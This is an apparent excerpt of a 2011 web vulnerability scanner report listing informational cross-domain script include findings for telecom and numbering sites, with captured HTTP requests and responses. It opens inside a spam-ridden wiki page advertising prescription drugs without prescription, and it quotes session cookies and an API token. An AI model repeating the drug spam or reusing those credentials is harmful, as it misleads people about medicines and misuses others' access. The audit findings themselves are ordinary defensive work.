title="http://comunidad.terra.es/blogs/buyxanax/archive/2011/05/05/buyxanaxonline.aspx#22919" rel="nofollow">http://comunidad.terra.es/blogs/buyxanax/archive/2011/05/05/buyxanaxonline.aspx#22919</a> xanax without prescription cheap - xanax without prescription cheap <a href="http://comunidad.terra.es/blogs/viagra/archive/2011/05/05/comprarviagragenricasinrecetaonline.aspx#37436" class="external free" title="http://comunidad.terra.es/blogs/viagra/archive/2011/05/05/comprarviagragenricasinrecetaonline.aspx#37436" rel="nofollow">http://comunidad.terra.es/blogs/viagra/archive/2011/05/05/comprarviagragenricasinrecetaonline.aspx#37436</a> comprar viagra - comprar viagra <a href="http://comunidad.terra.es/blogs/cialis/archive/2011/05/05/comprarcialisonline.aspx#65169" class="external free" title="http://comunidad.terra.es/blogs/cialis/archive/2011/05/05/comprarcialisonline.aspx#65169" rel="nofollow">http://comunidad.terra.es/blogs/cialis/archive/2011/05/05/comprarcialisonline.aspx#65169</a> cialis de descuento - comprar cialis barato cialis online <a href="http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=763102351#99468" class="external free" title="http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=763102351#99468" rel="nofollow">http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=763102351#99468</a> xanax cold turkey advice - xanax prescription drug <a href="http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=216102351#86049" class="external free" title="http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=216102351#86049" rel="nofollow">http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=216102351#86049</a> ambien buy online - ambien sleeping pill <a href="http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=656102351#70610" class="external free" title="http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=656102351#70610" rel="nofollow">http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=656102351#70610</a> how long valium stays in system - ordering valium fast <a href="http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=747102351#67248" class="external free" title="http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=747102351#67248" rel="nofollow">http://forums.healthcentral.com/discussion/sleep-disorders/forums?a=tpc&s=2361022&f=3181022&m=747102351#67248</a>
...[SNIP]...
<div id="f-poweredbyico"><a href="http://www.mediawiki.org/"><img src="/skins/common/images/poweredby_mediawiki_88x31.png" alt="Powered by MediaWiki" />
...[SNIP]...

18.37. http://www.vonage.com/lp/US/afflpdc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage.com
Path:	/lp/US/afflpdc/

Issue detail

The page was loaded from a URL containing a query string:

http://www.vonage.com/lp/US/afflpdc/?refer_id=AFLGN090801001W1&promo_id=USVONRP2499NSC_WEB&deviceType=VDV21_FREE_UPSELL

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.7/prototype.js
http://fls.doubleclick.net/activityi;src=2333498;type=vonag670;cat=afill201;ord=1?
http://vonage.122.2o7.net/b/ss/vonagedev/1/H.20.3--NS/0
http://www.omniture.com/

Request

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:50:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: refer_id=AFLGN090801001W1; expires=Fri, 27-May-2011 00:50:29 GMT; path=/; domain=.vonage.com
Location: http://www.vonage.com/lp/US/afflpdc/index.php
Set-Cookie: LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com
Content-Type: text/html
Content-Length: 18264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script language="javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.7/prototype.js" type="text/javascript"></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://vonage.122.2o7.net/b/ss/vonagedev/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2333498;type=vonag670;cat=afill201;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

19. Cross-domain script include previous next
There are 52 instances of this issue:

http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
http://fls.doubleclick.net/activityi
http://googleads.g.doubleclick.net/pagead/ads
http://investor.hickorytech.com/phoenix.zhtml
http://nanpa.org/
http://nanpa.org/about_overview.php
http://nanpa.org/awards_overview.php
http://nanpa.org/education_overview.php
http://nanpa.org/history.php
http://tis.org/
http://www.911enable.com/
http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/
http://www.catalysttelecom.com/
http://www.catalysttelecom.com/error.aspx
http://www.dslreports.com/forum/r25728643-Nettalk-number-portability-
http://www.facebook.com/plugins/like.php
http://www.hickorytech-is.com/products/cabs.aspx
http://www.hickorytech-is.com/products/suitesolution-.aspx
http://www.hickorytech-is.com/products/suitesolution-/usage-pricing-manager.aspx
http://www.hickorytech.com/
http://www.hickorytech.com/business-services/data.aspx
http://www.hickorytech.com/site-map.aspx
http://www.hickorytech.com/wholesale-services/access-services.aspx
http://www.hickorytech.com/wholesale-services/fiber-based-transport.aspx
http://www.hickorytech.com/wholesale-services/network-operations-center.aspx
http://www.job-search-engine.com/keyword/number-portability/
http://www.onwav.com/lnp
http://www.redskye911.com/
http://www.redskye911.com/e911_information_center/
http://www.redskye911.com/e911_information_center/e911_hosted_solutions/
http://www.redskye911.com/e911_information_center/e911_hosted_solutions/loadingAnimation.gif
http://www.redskye911.com/e911_information_center/loadingAnimation.gif
http://www.redskye911.com/e911_products/
http://www.redskye911.com/e911_products/e911_anywhere/hosted/
http://www.redskye911.com/e911_products/e911_anywhere/hosted/loadingAnimation.gif
http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/
http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/loadingAnimation.gif
http://www.redskye911.com/e911_products/e911_anywhere/network_services/
http://www.redskye911.com/e911_products/loadingAnimation.gif
http://www.redskye911.com/favicon.ico
http://www.redskye911.com/knowledge_base/
http://www.redskye911.com/knowledge_base/loadingAnimation.gif
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html
http://www.secviz.org/node/89
http://www.stumbleupon.com/badge/embed/1/
http://www.vonage-forum.com/forum8.html
http://www.vonage.com/lp/US/afflpdc/
http://www.vonage.com/lp/US/afflpdc/index.php
http://www.westcongroup.com/
http://www.westcongroup.com/sites/westcon-group-global/global/compass-e-commerce

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

19.1. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connectedplanetonline.com
Path:	/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/11870/slf.js
http://api.demandbase.com/api/v2/ip.json?token=b155ec5d50b5dcb41662f36b4d10a6f7702c87e6 &callback=dbase_parse
http://btn.clickability.com/97671/button_3/button.js
http://d.yimg.com/ds/badge2.js
http://disqus.com/forums/connectedplanet/embed.js
http://s7.addthis.com/js/152/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://tweetmeme.com/i/scripts/button.js
http://www.google.com/buzz/api/button.js
http://www.linkedin.com/companyInsider?script&useBorder=no
http://www.stumbleupon.com/hostedbadge.php?s=1

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Content-Type: text/html
Content-Length: 53276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

<script type="text/javascript" src="http://btn.clickability.com/97671/button_3/button.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v2/ip.json?token=b155ec5d50b5dcb41662f36b4d10a6f7702c87e6 &callback=dbase_parse"></script>
...[SNIP]...
</script>

<script src="http://www.linkedin.com/companyInsider?script&useBorder=no" type="text/javascript"></script>
...[SNIP]...
</li><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div class="share-box-stumble">
<script src="http://www.stumbleupon.com/hostedbadge.php?s=1"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://d.yimg.com/ds/badge2.js"
badgetype="small-votes">
</script>
...[SNIP]...
</div><script type="text/javascript" src="http://disqus.com/forums/connectedplanet/embed.js"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/11870/slf.js" type="text/javascript"></script>
...[SNIP]...

19.2. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

Response

19.3. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js

Request

Response

19.4. http://investor.hickorytech.com/phoenix.zhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investor.hickorytech.com
Path:	/phoenix.zhtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://media.corporate-ir.net/media_files/irol/global_js/phoenix.js
http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2

Request

Response

19.5. http://nanpa.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
https://s7.addthis.com/js/250/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:38 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 24631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</div>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
<div id="recent_fb">
<script src="http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript">

...[SNIP]...

19.6. http://nanpa.org/about_overview.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/about_overview.php

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:19 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

19.7. http://nanpa.org/awards_overview.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/awards_overview.php

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:01 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

19.8. http://nanpa.org/education_overview.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/education_overview.php

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:59 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

19.9. http://nanpa.org/history.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/history.php

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:49 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 37882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

19.10. http://tis.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tis.org
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://images.smartname.com/scripts/MgOpen_Modata_400.font.js
http://images.smartname.com/scripts/cookies.js
http://images.smartname.com/scripts/cufon-yui.js
http://images.smartname.com/scripts/frontend.js
http://images.smartname.com/scripts/general.js
http://images.smartname.com/scripts/google_afd_v2.js
http://images.smartname.com/scripts/jquery-1.3.2.min.js
http://p.chango.com/p.js
http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:43:06 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: COOKIE=10.5.16.243.1305160986882003; path=/
Set-Cookie: referrer=; path=/
Set-Cookie: t=cd7bec407c3011e0b0290015c5e75168; path=/
Set-Cookie: referrer=tis.org; path=/
Set-Cookie: visitorxtis.org=1
Set-Cookie: Template--tis.org=3D_Bars; path=/
Set-Cookie: FeedProvider--tis.org=Google; path=/
Vary: Accept-Encoding,User-Agent
Cartoon: aalander6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>
<head>

<title>

tis.org

</tit
...[SNIP]...
<link rel="Shortcut Icon" href="http://images.smartname.com/smartname/images/favicon.ico">

<script type="text/javascript" language="JavaScript1.2" src="http://images.smartname.com/scripts/frontend.js"></script>
<script type="text/javascript" language="JavaScript1.2" src="http://images.smartname.com/scripts/cookies.js"></script>
<script type="text/javascript" src="http://images.smartname.com/scripts/jquery-1.3.2.min.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://images.smartname.com/scripts/general.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript1.2" src="http://images.smartname.com/scripts/google_afd_v2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://p.chango.com/p.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://images.smartname.com/scripts/cufon-yui.js"></script>
<script type="text/javascript" src="http://images.smartname.com/scripts/MgOpen_Modata_400.font.js"></script>
...[SNIP]...

19.11. http://www.911enable.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.911enable.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET / HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 302 Redirect
Content-Type: text/html; charset=UTF-8
Location: ./business.php
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:06:13 GMT
Content-Length: 18307

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="./business.php">here</a></body><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

19.12. http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.anpisolutions.com
Path:	/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/

Issue detail

The response dynamically includes the following scripts from other domains:

http://maps.google.com/maps/api/js?sensor=false&ver=3.1.1
http://viewer.zmags.com/js/thumb.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:05 GMT
Server: Apache
Vary: Accept-Encoding,Cookie
Accept-Ranges: bytes
X-Pingback: http://www.anpisolutions.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Content-Type: text/html; charset=UTF-8
Content-Length: 23377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
</script>
<script type='text/javascript' src='http://maps.google.com/maps/api/js?sensor=false&ver=3.1.1'></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://viewer.zmags.com/js/thumb.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="//www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

19.13. http://www.catalysttelecom.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.catalysttelecom.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9962.js
https://webtrends.scansourceinc.com/WebTrends.js

Request

GET / HTTP/1.1
Host: www.catalysttelecom.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:10:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dnlido55njvizl55cf4mdjbt; path=/; HttpOnly
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 31799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link id
...[SNIP]...
</script>
<script type="text/javascript" src="https://webtrends.scansourceinc.com/WebTrends.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9962.js">
</script>
...[SNIP]...

19.14. http://www.catalysttelecom.com/error.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.catalysttelecom.com
Path:	/error.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9962.js
https://webtrends.scansourceinc.com/WebTrends.js

Request

GET /error.aspx HTTP/1.1
Host: www.catalysttelecom.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.catalysttelecom.com/resources/css/default.css
Cookie: ASP.NET_SessionId=o4icnqvy0pltzfzcg0bjlsbi; __utma=1.1865832033.1305162643.1305162643.1305162643.1; __utmb=1.1.10.1305162643; __utmc=1; __utmz=1.1305162643.1.1.utmcsr=redskye911.com|utmccn=(referral)|utmcmd=referral|utmcct=/e911_products/e911_anywhere/hosted/purchasing/

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:10:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link id
...[SNIP]...
</script>
<script type="text/javascript" src="https://webtrends.scansourceinc.com/WebTrends.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9962.js">
</script>
...[SNIP]...

19.15. http://www.dslreports.com/forum/r25728643-Nettalk-number-portability- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dslreports.com
Path:	/forum/r25728643-Nettalk-number-portability-

Issue detail

The response dynamically includes the following scripts from other domains:

http://i.dslr.net/css/aj6m.js?v20
http://i.dslr.net/css/ct2m.js?v20
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /forum/r25728643-Nettalk-number-portability- HTTP/1.1
Host: www.dslreports.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 00:45:47 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Last-Modified: Tue, 12 Apr 2011 15:32:11 GMT
Cache-Control: private
Content-Length: 28725

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache"><META http-equiv="Content-Style-Type" c
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://i.dslr.net/css/aj6m.js?v20"></script>
...[SNIP]...
<BODY TEXT="#000000" >
<script type="text/javascript" src="http://i.dslr.net/css/ct2m.js?v20"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

19.16. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Request

Response

19.17. http://www.hickorytech-is.com/products/cabs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hickorytech-is.com
Path:	/products/cabs.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET /products/cabs.aspx HTTP/1.1
Host: www.hickorytech-is.com
Proxy-Connection: keep-alive
Referer: http://www.hickorytech-is.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=kn1HQ8lGzAEkAAAANTUxOTkwMDUtMTlhZC00NjBiLTlhZWUtOTc5OTU2NzkzNDgx0; sifrFetch=true; __utmz=18594464.1305158372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18594464.1340748012.1305158372.1305158372.1305158372.1; __utmc=18594464; __utmb=18594464.1.10.1305158372; language=en-US

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:02:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

19.18. http://www.hickorytech-is.com/products/suitesolution-.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hickorytech-is.com
Path:	/products/suitesolution-.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET /products/suitesolution-.aspx HTTP/1.1
Host: www.hickorytech-is.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
